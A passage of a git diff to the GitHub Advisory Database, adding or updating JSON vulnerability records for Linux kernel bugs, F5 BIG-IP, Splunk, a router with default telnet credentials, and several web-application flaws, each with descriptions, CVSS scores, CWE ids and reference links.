newbee-mall up to a069069b07027613bf0e7f571736be86f431faee. Affected is an unknown function of the component Multiple Endpoints. Performing a manipulation results in cross-site request forgery. Remote exploitation of the attack is possible. The exploit has been made public and could be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2658" + }, + { + "type": "WEB", + "url": "https://github.com/newbee-ltd/newbee-mall/issues/106" + }, + { + "type": "WEB", + "url": "https://github.com/newbee-ltd/newbee-mall/issues/107" + }, + { + "type": "WEB", + "url": "https://github.com/newbee-ltd/newbee-mall" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346456" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346456" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752797" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752798" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752799" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752800" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752801" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752802" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752803" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752804" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752805" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752806" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json b/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json new file mode 100644 index 0000000000000..8a83d4beed92d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9wwr-2jh3-482p", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23220" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix infinite loop caused by next_smb2_rcv_hdr_off reset in error paths\n\nThe problem occurs when a signed request fails smb2 signature verification\ncheck. In __process_request(), if check_sign_req() returns an error,\nset_smb2_rsp_status(work, STATUS_ACCESS_DENIED) is called.\nset_smb2_rsp_status() set work->next_smb2_rcv_hdr_off as zero. By resetting\nnext_smb2_rcv_hdr_off to zero, the pointer to the next command in the chain\nis lost. Consequently, is_chained_smb2_message() continues to point to\nthe same request header instead of advancing. If the header's NextCommand\nfield is non-zero, the function returns true, causing __handle_ksmbd_work()\nto repeatedly process the same failed request in an infinite loop.\nThis results in the kernel log being flooded with \"bad smb2 signature\"\nmessages and high CPU usage.\n\nThis patch fixes the issue by changing the return value from\nSERVER_HANDLER_CONTINUE to SERVER_HANDLER_ABORT. This ensures that\nthe processing loop terminates immediately rather than attempting to\ncontinue from an invalidated offset.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23220" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5accdc5b7f28a81bbc5880ac0b8886e60c86e8c8" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/71b5e7c528315ca360a1825a4ad2f8ae48c5dc16" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9135e791ec2709bcf0cda0335535c74762489498" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f7b1c2f5642bbd60b1beef1f3298cbac81eb232c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json b/advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json index 56e6e2ccb704d..2b556ed679ad7 100644 --- a/advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json +++ b/advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c56r-fcf4-6rp2", - "modified": "2026-02-17T21:31:14Z", + "modified": "2026-02-18T18:30:35Z", "published": "2026-02-17T21:31:14Z", "aliases": [ "CVE-2026-22769" @@ -19,6 +19,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22769" }, + { + "type": "WEB", + "url": "https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-22769" + }, { "type": "WEB", "url": "https://www.dell.com/support/kbdoc/en-us/000426773/dsa-2026-079" diff --git a/advisories/unreviewed/2026/02/GHSA-chpq-fr33-gp2m/GHSA-chpq-fr33-gp2m.json b/advisories/unreviewed/2026/02/GHSA-chpq-fr33-gp2m/GHSA-chpq-fr33-gp2m.json new file mode 100644 index 0000000000000..d042df595b1e6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-chpq-fr33-gp2m/GHSA-chpq-fr33-gp2m.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-chpq-fr33-gp2m", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-2507" + ], + "details": "When BIG-IP AFM or BIG-IP DDoS is provisioned, undisclosed traffic can cause TMM to terminate.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2507" + }, + { + "type": "WEB", + "url": "https://my.f5.com/manage/s/article/K000160003" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f2fg-5m3g-hqwv/GHSA-f2fg-5m3g-hqwv.json b/advisories/unreviewed/2026/02/GHSA-f2fg-5m3g-hqwv/GHSA-f2fg-5m3g-hqwv.json new file mode 100644 index 0000000000000..9787b8ae1e39c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f2fg-5m3g-hqwv/GHSA-f2fg-5m3g-hqwv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f2fg-5m3g-hqwv", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-65519" + ], + "details": "mayswind ezbookkeeping versions 1.2.0 and earlier contain a critical vulnerability in JSON and XML file import processing. The application fails to validate nesting depth during parsing operations, allowing authenticated attackers to trigger denial of service conditions by uploading deeply nested malicious files. This results in CPU exhaustion, service degradation, or complete service unavailability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65519" + }, + { + "type": "WEB", + "url": "https://github.com/ictrun/EBK-SA-2025-001" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-674" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f5pv-9whq-7mv7/GHSA-f5pv-9whq-7mv7.json b/advisories/unreviewed/2026/02/GHSA-f5pv-9whq-7mv7/GHSA-f5pv-9whq-7mv7.json new file mode 100644 index 0000000000000..02ecb48a96ecf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f5pv-9whq-7mv7/GHSA-f5pv-9whq-7mv7.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f5pv-9whq-7mv7", + "modified": "2026-02-18T18:30:41Z", + "published": "2026-02-18T18:30:41Z", + "aliases": [ + "CVE-2026-20144" + ], + "details": "In Splunk Enterprise versions below 10.2.0, 10.0.2, 9.4.7, 9.3.8, and 9.2.11, and Splunk Cloud Platform versions below 10.2.2510.0, 10.1.2507.11, 10.0.2503.9, and 9.3.2411.120, a user of a Splunk Search Head Cluster (SHC) deployment who holds a role with access to the the Splunk _internal index could view the Security Assertion Markup Language (SAML) configurations for Attribute query requests (AQRs) or Authentication extensions in plain text within the conf.log file, depending on which feature is configured.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20144" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2026-0209" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json b/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json index 19cf6653aedee..2b5fbe79d83f6 100644 --- a/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json +++ b/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f7cx-4c4g-9g59", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T18:30:38Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2025-61982" @@ -22,6 +22,10 @@ { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2292" + }, + { + "type": "WEB", + "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2292" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json b/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json new file mode 100644 index 0000000000000..8e276b81e5f52 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f7pj-q7w5-89fg", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71236" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Validate sp before freeing associated memory\n\nSystem crash with the following signature\n[154563.214890] nvme nvme2: NVME-FC{1}: controller connect complete\n[154564.169363] qla2xxx [0000:b0:00.1]-3002:2: nvme: Sched: Set ZIO exchange threshold to 3.\n[154564.169405] qla2xxx [0000:b0:00.1]-ffffff:2: SET ZIO Activity exchange threshold to 5.\n[154565.539974] qla2xxx [0000:b0:00.1]-5013:2: RSCN database changed – 0078 0080 0000.\n[154565.545744] qla2xxx [0000:b0:00.1]-5013:2: RSCN database changed – 0078 00a0 0000.\n[154565.545857] qla2xxx [0000:b0:00.1]-11a2:2: FEC=enabled (data rate).\n[154565.552760] qla2xxx [0000:b0:00.1]-11a2:2: FEC=enabled (data rate).\n[154565.553079] BUG: kernel NULL pointer dereference, address: 00000000000000f8\n[154565.553080] #PF: supervisor read access in kernel mode\n[154565.553082] #PF: error_code(0x0000) - not-present page\n[154565.553084] PGD 80000010488ab067 P4D 80000010488ab067 PUD 104978a067 PMD 0\n[154565.553089] Oops: 0000 1 PREEMPT SMP PTI\n[154565.553092] CPU: 10 PID: 858 Comm: qla2xxx_2_dpc Kdump: loaded Tainted: G OE ------- --- 5.14.0-503.11.1.el9_5.x86_64 #1\n[154565.553096] Hardware name: HPE Synergy 660 Gen10/Synergy 660 Gen10 Compute Module, BIOS I43 09/30/2024\n[154565.553097] RIP: 0010:qla_fab_async_scan.part.0+0x40b/0x870 [qla2xxx]\n[154565.553141] Code: 00 00 e8 58 a3 ec d4 49 89 e9 ba 12 20 00 00 4c 89 e6 49 c7 c0 00 ee a8 c0 48 c7 c1 66 c0 a9 c0 bf 00 80 00 10 e8 15 69 00 00 <4c> 8b 8d f8 00 00 00 4d 85 c9 74 35 49 8b 84 24 00 19 00 00 48 8b\n[154565.553143] RSP: 0018:ffffb4dbc8aebdd0 EFLAGS: 00010286\n[154565.553145] RAX: 0000000000000000 RBX: ffff8ec2cf0908d0 RCX: 0000000000000002\n[154565.553147] RDX: 0000000000000000 RSI: ffffffffc0a9c896 RDI: ffffb4dbc8aebd47\n[154565.553148] RBP: 0000000000000000 R08: ffffb4dbc8aebd45 R09: 0000000000ffff0a\n[154565.553150] R10: 0000000000000000 R11: 000000000000000f R12: ffff8ec2cf0908d0\n[154565.553151] R13: ffff8ec2cf090900 R14: 0000000000000102 R15: ffff8ec2cf084000\n[154565.553152] FS: 0000000000000000(0000) GS:ffff8ed27f800000(0000) knlGS:0000000000000000\n[154565.553154] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[154565.553155] CR2: 00000000000000f8 CR3: 000000113ae0a005 CR4: 00000000007706f0\n[154565.553157] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[154565.553158] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[154565.553159] PKRU: 55555554\n[154565.553160] Call Trace:\n[154565.553162] \n[154565.553165] ? show_trace_log_lvl+0x1c4/0x2df\n[154565.553172] ? show_trace_log_lvl+0x1c4/0x2df\n[154565.553177] ? qla_fab_async_scan.part.0+0x40b/0x870 [qla2xxx]\n[154565.553215] ? __die_body.cold+0x8/0xd\n[154565.553218] ? page_fault_oops+0x134/0x170\n[154565.553223] ? snprintf+0x49/0x70\n[154565.553229] ? exc_page_fault+0x62/0x150\n[154565.553238] ? asm_exc_page_fault+0x22/0x30\n\nCheck for sp being non NULL before freeing any associated memory", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71236" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1a9585e4c58d1f1662b3ca46110ed4f583082ce5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/40ae93668226b610edb952c6036f607a61750b57" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/944378ead9a48d5d50e9e3cc85e4cdb911c37ca1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/949010291bb941d53733ed08a33454254d9afb1b" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fqrv-m9rv-j33j/GHSA-fqrv-m9rv-j33j.json b/advisories/unreviewed/2026/02/GHSA-fqrv-m9rv-j33j/GHSA-fqrv-m9rv-j33j.json new file mode 100644 index 0000000000000..f089e1845901b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fqrv-m9rv-j33j/GHSA-fqrv-m9rv-j33j.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fqrv-m9rv-j33j", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-70998" + ], + "details": "UTT HiPER 810 / nv810v4 router firmware v1.5.0-140603 was discovered to contain insecure default credentials for the telnet service, possibly allowing a remote attacker to gain root access via a crafted script.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70998" + }, + { + "type": "WEB", + "url": "https://github.com/cha0yang1/UTT-nv810v4-telnet-backdoor" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1188" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json b/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json new file mode 100644 index 0000000000000..d0f1a3d713ba5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3vh-wfh4-fp76", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23227" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/exynos: vidi: use ctx->lock to protect struct vidi_context member variables related to memory alloc/free\n\nExynos Virtual Display driver performs memory alloc/free operations\nwithout lock protection, which easily causes concurrency problem.\n\nFor example, use-after-free can occur in race scenario like this:\n```\n\tCPU0\t\t\t\tCPU1\t\t\t\tCPU2\n\t----\t\t\t\t----\t\t\t\t----\n vidi_connection_ioctl()\n if (vidi->connection) // true\n drm_edid = drm_edid_alloc(); // alloc drm_edid\n ...\n ctx->raw_edid = drm_edid;\n ...\n\t\t\t\t\t\t\t\tdrm_mode_getconnector()\n\t\t\t\t\t\t\t\t drm_helper_probe_single_connector_modes()\n\t\t\t\t\t\t\t\t vidi_get_modes()\n\t\t\t\t\t\t\t\t if (ctx->raw_edid) // true\n\t\t\t\t\t\t\t\t drm_edid_dup(ctx->raw_edid);\n\t\t\t\t\t\t\t\t if (!drm_edid) // false\n\t\t\t\t\t\t\t\t ...\n\t\t\t\tvidi_connection_ioctl()\n\t\t\t\t if (vidi->connection) // false\n\t\t\t\t drm_edid_free(ctx->raw_edid); // free drm_edid\n\t\t\t\t ...\n\t\t\t\t\t\t\t\t drm_edid_alloc(drm_edid->edid)\n\t\t\t\t\t\t\t\t kmemdup(edid); // UAF!!\n\t\t\t\t\t\t\t\t ...\n```\n\nTo prevent these vulns, at least in vidi_context, member variables related\nto memory alloc/free should be protected with ctx->lock.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23227" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0cd2c155740dbd00868ac5a8ae5d14cd6b9ed385" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/60b75407c172e1f341a8a5097c5cbc97dbbdd893" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g4wf-v389-9w53/GHSA-g4wf-v389-9w53.json b/advisories/unreviewed/2026/02/GHSA-g4wf-v389-9w53/GHSA-g4wf-v389-9w53.json index f34fed717a9c1..844bd1e2c59c4 100644 --- a/advisories/unreviewed/2026/02/GHSA-g4wf-v389-9w53/GHSA-g4wf-v389-9w53.json +++ b/advisories/unreviewed/2026/02/GHSA-g4wf-v389-9w53/GHSA-g4wf-v389-9w53.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g4wf-v389-9w53", - "modified": "2026-02-03T09:30:28Z", + "modified": "2026-02-18T18:30:22Z", "published": "2026-02-03T09:30:28Z", "aliases": [ "CVE-2026-1591" diff --git a/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json b/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json new file mode 100644 index 0000000000000..39c71f21b1a2e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h437-rr98-fx56", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23223" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfs: fix UAF in xchk_btree_check_block_owner\n\nWe cannot dereference bs->cur when trying to determine if bs->cur\naliases bs->sc->sa.{bno,rmap}_cur after the latter has been freed.\nFix this by sampling before type before any freeing could happen.\nThe correct temporal ordering was broken when we removed xfs_btnum_t.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23223" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1d411278dda293a507cb794db7d9ed3511c685c6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ba5264610423d9653aa36920520902d83841bcfd" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ed82e7949f5cac3058f4100f3cd670531d41a266" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json b/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json new file mode 100644 index 0000000000000..b92de6f89b751 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hcrc-x9p4-f9jh", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70152" + ], + "details": "code-projects Community Project Scholars Tracking System 1.0 is vulnerable to SQL Injection in the admin user management endpoints /admin/save_user.php and /admin/update_user.php. These endpoints lack authentication checks and directly concatenate user-supplied POST parameters (firstname, lastname, username, password, user_id) into SQL queries without validation or parameterization.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70152" + }, + { + "type": "WEB", + "url": "https://code-projects.org/scholars-tracking-system-in-php-with-source-code" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70152-Scholars-SQLi-Missing-Auth" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json b/advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json index 1ffb44e84eae6..11e3ba70bf164 100644 --- a/advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json +++ b/advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json @@ -33,7 +33,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-400" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json b/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json new file mode 100644 index 0000000000000..25b2b77eec1f3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j6h2-wr53-6vcg", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23228" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: server: fix leak of active_num_conn in ksmbd_tcp_new_connection()\n\nOn kthread_run() failure in ksmbd_tcp_new_connection(), the transport is\nfreed via free_transport(), which does not decrement active_num_conn,\nleaking this counter.\n\nReplace free_transport() with ksmbd_tcp_disconnect().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23228" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/599271110c35f6b16e2e4e45b9fbd47ed378c982" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/787769c8cc50416af7b8b1a36e6bcd6aaa7680aa" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/baf664fc90a6139a39a58333e4aaa390c10d45dc" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/cd25e0d809531a67e9dd53b19012d27d2b13425f" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json b/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json new file mode 100644 index 0000000000000..edaeeda4887fe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j87r-wgfm-7fjj", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23229" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: virtio - Add spinlock protection with virtqueue notification\n\nWhen VM boots with one virtio-crypto PCI device and builtin backend,\nrun openssl benchmark command with multiple processes, such as\n openssl speed -evp aes-128-cbc -engine afalg -seconds 10 -multi 32\n\nopenssl processes will hangup and there is error reported like this:\n virtio_crypto virtio0: dataq.0:id 3 is not a head!\n\nIt seems that the data virtqueue need protection when it is handled\nfor virtio done notification. If the spinlock protection is added\nin virtcrypto_done_task(), openssl benchmark with multiple processes\nworks well.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23229" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/49c57c6c108931a914ed94e3c0ddb974008260a3" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c0a0ded3bb7fd45f720faa48449a930153257d3a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d6f0d586808689963e58fd739bed626ff5013b24" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e69a7b0a71b6561b3b6459f1fded8d589f2e8ac2" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jggw-c47g-3w3q/GHSA-jggw-c47g-3w3q.json b/advisories/unreviewed/2026/02/GHSA-jggw-c47g-3w3q/GHSA-jggw-c47g-3w3q.json index 8de01d65798ed..99b4c77dd87af 100644 --- a/advisories/unreviewed/2026/02/GHSA-jggw-c47g-3w3q/GHSA-jggw-c47g-3w3q.json +++ 